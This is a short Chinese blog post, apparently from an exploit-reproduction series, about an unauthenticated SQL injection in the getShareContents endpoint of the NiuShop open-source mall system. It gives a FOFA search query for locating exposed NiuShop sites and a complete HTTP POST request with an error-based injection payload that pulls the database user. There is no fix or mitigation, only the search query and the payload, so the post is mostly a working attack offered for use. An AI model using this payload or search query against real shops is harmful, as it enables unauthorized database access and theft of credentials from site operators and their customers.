Babing
Published on 2024-08-30 / 1 Visits
0
0

S12-1山西牛酷信息科技-NiuShop开源商城系统-SQL

S12-1山西牛酷信息科技-NiuShop开源商城系统-SQL

漏洞描述:

NiuShop开源商城系统 getShareContents接口处存在SQL注入漏洞,未授权的攻击者可以利用此漏洞获取数据库敏感信息及凭证,进一步利用可获取服务器权限

网站图片:

image.png

网络测绘:

fofa语法:

body=“niushop_url_model” && body=“niushop_rewrite_model”

漏洞复现:

payload:

POST /index.php?s=/wap/goods/getShareContents/// HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded

flag=goods&goods_id={{int(0-100|3)}}) AND GTID_SUBSET(CONCAT(0x7e,(SELECT (USER())),0x7e),1)--+&shop_id=0

效果图:

image-20240626121030669


Comment